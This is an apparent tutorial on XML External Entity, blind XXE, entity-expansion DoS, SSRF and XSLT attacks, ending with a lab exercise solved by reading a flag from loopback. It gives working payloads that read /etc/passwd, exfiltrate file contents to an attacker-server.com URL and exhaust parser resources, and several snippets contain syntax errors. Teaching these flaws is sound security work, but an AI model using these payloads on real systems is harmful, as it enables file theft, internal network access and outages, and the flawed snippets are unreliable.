# The XML world and its + SSRF security flaws 

## To get you in the picture
Before I start talking about bugs, I need to do a brief introduction to XML. I will also mention the second SSRF error (Server-side request forgery), which is listed together with XML vulnerabilities due to the fact that very often when there is a security bug using XML, SSRF also appears

## XML (Extensible Markup Language) - What is it?
XML is a markup language that is used to describe various data in a more structured and transparent way. It is very often used in various formats such as .docx. It allows you to write data in an object-oriented manner, similar to the JSON format.
Due to the fact that it is a language that presents a certain structure, there are also applications that analyze, read and modify this structure. An example may be an application that downloads products from a database, which are then presented in the XML document format, either for the user or for the application, for the purpose of more convenient work.
Sample XML code looks like this:
```xml
<products>
    <laptops>
        <name> Gaming Laptop </name>
    </laptops>
    <cpu>
        <name> Intel core i5 6600k </name>
    </cpu>
</products>
```
As you can see, XML is a bit like HTML. Markers are also used, but the interpretation and freedom of creation is completely different. 
The first question that may arise when you see this code is, can special characters be written here? Yes and no.
Characters such as
```haskell
<> // 
```
and others are treated as part of the syntax. The solution to this problem is to use an entity.
```xml
<name >Gaming &gt; laptop </name>
```
will be output encoded as
```xml
<name> Gaming > laptop </name>
```
However, the ">" character could not be written normally before parsing. Hence the use of entity. Attacks involving XML are related to the subject of the entity.

## XML - Entities
The use of different types of entities for special characters is clear, and there is no problem here. It turns out, however, that XML enables entity definitions. In order to create a new entity, you must first declare a DTD (Document Type Definition), which should be at the beginning of the file. The DTD allows you to define the required tags, attributes and attribute values additionally, which is very interesting, it allows you to define an entity.
```xml
<!DOCTYPE data [
<!ENTITY special_product "Special Gaming Super Laptop"
]>
<products>
    <laptops>
        <name> Gaming Laptop </name>
        <s>&special_product;</s>
    </laptops>
    <cpu>
        <name> Intel core i5 6600k </name>
    </cpu>
</products>
```
The DTD definition and its contents take up full three lines. The content defines a new entity named "special_product" and the content "Special Gaming Super Laptop". From now on, each call to this new entity will mean the display of the super laptop description. 
Nothing dangerous yet, but it turns out that you can define an entity that points to the contents of the file!
```xml
<!DOCTYPE data [
<!ENTITY special_product SYSTEM "/etc/passwd"
]>
<products>
    <laptops>
        <name> Gaming Laptop </name>
        <s>&special_product;</s>
    </laptops>
    <cpu>
        <name> Intel core i5 6600k </name>
    </cpu>
</products>
```
Analyzing this XML will give us the content of the `/ etc / passwd` file as the value of the special_product entity.
We can already see that if the application admits XML data and then returns it without prior validation, we can get access to the files on the server. However, before I move on to a specific vulnerability, I’m going to  describe one more type of entity, the so-called parametric entities.
These are entities that can be declared, but only DTDs:
```xml
<!DOCTYPE data [
<!ENTITY % special_product SYSTEM "/etc/passwd"
]>
<products>
    <laptops>
        <name> Gaming Laptop </name>
        <s>%special_product;</s>
    </laptops>
    <cpu>
        <name> Intel core i5 6600k </name>
    </cpu>
</products>
```
As you can see, the difference in the notation is the additional "%" sign in the definition and reference.

## XXE (XML External Entity)
As the name suggests, the XXE attack is an entity-based attack against external XML files.
```xml
<!DOCTYPE data [
<!ENTITY special_product SYSTEM "/etc/passwd"
]>
<products>
    <laptops>
        <name> Gaming Laptop </name>
        <s>&special_product;</s>
    </laptops>
    <cpu>
        <name> Intel core i5 6600k </name>
    </cpu>
</products>
```
Let me use the above example to highlight four more problems.
The first problem, of course, is to find a suitable endpoint to send a malicious XML to. In the age of such complex applications, it’s not a big problem. 
What is important is the second issue, which is to find the right tag for injection. An application that receives XML very often does not use all the data for later display. It may turn out that the application retrieves user data such as first name, last name, year of birth or username, but only displays the username on the output. Therefore, injecting entity in them will not work for all fields except for the username, because they will not be displayed anywhere. 
The third problem is finding the tag that is left after parsing. 
Another problem is knowing how the XML is built. We need to know what tags are in the XML file to send malicious data. It's usually not a problem, because the exchange between the user and the XML content server is quite frequent. 
The last problem is the parameter of a specific tag, e.g.
```xml
<product id="123"> Laptop </product>
```
We get output information like this:
```sh
The 123 product has been placed in your cart
```
So the malicious entity should be injected into the user parameter itself. Unfortunately, this is not possible, but there is also a parametric entity that will help you with this task. Due to the fact that you cannot define an entity in the entity in the same file, you need to use an external file.

XML_attack_1:
```xml
<DOCTYPE data [
<!ENTITY % file SYSTEM "/etc/passwd">
<!ENTITY % external SYSTEM "http://attacker-server.com/exploit.xml"
%external;
%x;
]>
<product id="123&s;"> Laptop </product>
```

XML_attack_2:
```xml
<!ENTITY %x '<!ENTITY s "%file;">'>
```
The first file defines a file entity that shows the contents of the `/etc/passwd` file. Another external entity loads the entity from an external file on the attacker’s server. In which there are two entities %x and &s;. 

The first one points to the second one, which points to the %file entity, i.e. the passwd file content. Such confusing and nested usage allows you to avoid parser error when using entity within an entity.

## Blind XXE
I mentioned a few problems above, another of which has its solution. If the application does not return information about the operation, you can issue a special query to the server over which we have control.
This works much like the last example, but with some differences:
XML_attack_1:
```xml
<DOCTYPE data [
<!ENTITY % file SYSTEM "/etc/passwd">
<!ENTITY % external SYSTEM "http://attacker-server.com/exploit.xml"
%external;
%x;
%x2:
]>
<product id="123&s;"> Laptop </product>
```
XML_attack_2:
```xml
<!ENTITY %x '<!ENTITY &#x25; x2 "https://attacker-server.com/?file=%file;">'>
```
First, we display one more entity in the first file, because we used an additional entity in the second file to define a reference to an external server. An attacker monitoring their server after executing such a code will get:
```sh
GET /?file=tresc_pliku
```
It is worth adding that $#25 is a percent-encoded sign.

## Billion Laughs
The Billion Laughs attack is a DoS attack, and its name comes from the entity name that is often used in the error examples, i.e. &lol; (lol stands for laughing out loud). On the other hand, billion because of the nested entities that I’m going to explain now.
Since you can do an entity in an entity, we can define the following entities:
```xml
<DOCTYPE lolz[
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;">
<!ENTITY Lol2 "&lol1;&lol1;&lol1;">
]>
<data>&lolg2;</data>
```
As you can see, the size of the entity grows very quickly. The lol one entity has three lol words and the lol2 entity has already 27 words. If I defined 6 entities, 10 in each with one letter content, then at the output the app would have to process about a million bytes i.e. 1MB!. But I would be sending data in bytes, not even 1 kB. For a certain size, the application would no longer be able to process the query and it would either continually process them, or fill up the disk space by calling DoS in both cases.

## Quadratic Blowup
At one point there was a response to the Billion Laughs attack, and the parsers introduced nesting limitations. However, you can still send an entity of 10,000 characters repeated e.g. 10,000 times. This is a less efficient solution, but still effective. If the parser only allows 10 nests, you can try to combine the two attacks and define an entity that is 10,000 characters long, then repeat the entity 10,000 times and nest it every time. The effect will be counted in TB of data, which will definitely make the application come to a halt, resulting in a DoS attack.
```xml
<DOCTYPE lolz[
<!ENTITY lol "lol [10,000 times]">
<!ENTITY lol1 "&lol;&lol;&lol; [10,000 times]">
// and 8 more such entities
]>
<data>&lolg2;</data>
```

## SSRF
Server-Side Request Forgery is an attack which consists in gaining access to servers behind the actual server. These can be local machines or other servers that cannot be accessed directly from the Internet, but only from the network where the server is located. There are many places where this gap may occur. You can mostly come across it when some files are uploaded from an external server in the form of parameters, for example:
```html
/?file=https://server.com/main.js
```
In this case, you can try to issue inquiries e.g. to local or loopback addresses:
```html
http://127.0.0.1:80/
```
In this way, for example, you can scan ports on a local network and access services that are most likely not secured like the server exposed to the world. In addition, you can often play with protocols, e.g.
```sh
file:///etc/passwd
```
It allows you to retrieve the contents of the `/etc/passwd` file.
Nothing prevents you from downloading your own files shared on a server controlled by you.
```sh
https://evil-site.com/evil.php
```
In smaller applications, anti-SSRF filters are often created to block references to loopback. Often, however, ineffectively, because the address 127.0.0.1 is blocked, and 127.0.0.3 or 127.0.1.1 is also the loopback address. Additionally, even if these addresses are blacklisted, you can still often refer to the loopback via Ipv6 :: 1 address 

## XXE + SSRF
At the outset, I mentioned that SSRF is often associated with a Type XXE vulnerability. So I’m going to present a short XML file that uses both of these vulnerabilities:
```xml
<DOCTYPE data [
<!ENTITY % file SYSTEM "/etc/passwd">
<!ENTITY % external SYSTEM "http://127.0.0.1"
%external;
%x;
%x2:
]>
<product id="123&s;"> Laptop </product>
```
As I mentioned in the case of XXE. An attacker can often define their server, and if so, it's okay to define a loopback or any local server. This vulnerability has the same SSRF capabilities, i.e. you can, for example, scan ports bypassing the firewall. You can reference the file:// protocol which can come in handy when direct file referencing is blocked.

## XSLT - Malicious code execution
XSLT is a transformation language that allows you to transform different types of XML notation with each other. Since the XSLT language works on XML, there is probably a chance to use entities that can be used, for example, for an SSRF attack. And such a claim is half correct, because a similar mechanism is used, which can handle the SSRF really well, but unfortunately not reading files. I mentioned this before that sometimes SSRF is the only way to read a file even though there is a security bug in XML parsing.
```xslt
<xs1:template match="/">
    <xs1:value-of-select="document('http://127.0.0.1:80')"/>
</xs1:template match ="/">
```
Of course, you can freely use the file://.

## XXE + SSRF Exercise
The purpose of this task is to read the flag from the loopback (127.0.0.1) on port 91. Note that this server cannot be accessed directly from the Internet.
Additionally, XXE is in the <name> tag, and XML itself is built that way
```xml
<root>
    <name></name>
</root>
```
The exercise is available at:
```html
http://vuln.vms.perkmylife.com:83
```

Solution:
Notably there is a tag `<data></data>` next to the form, which may suggest that it is one of the tags used in this application.
Let's prepare a simple XML:
```xml
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "/etc/passwd">
]>
<root>
	<name>&xxe;</name>
</root>
```
An XML file defined in this way returns the contents of `/etc/passwd`. However, we still don’t know where the application might be on the port 91. It would be much more convenient to use SSRF to download the loopback home page.
```xml
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://127.0.0.1:91/flag.txt">
]>
<root>
	<name>&xxe;</name>
</root>
```
On the output we get the desired flag using XXE and SSRF simultaneously.

> @todo, commit all these files server side, exploits to /src/vuln/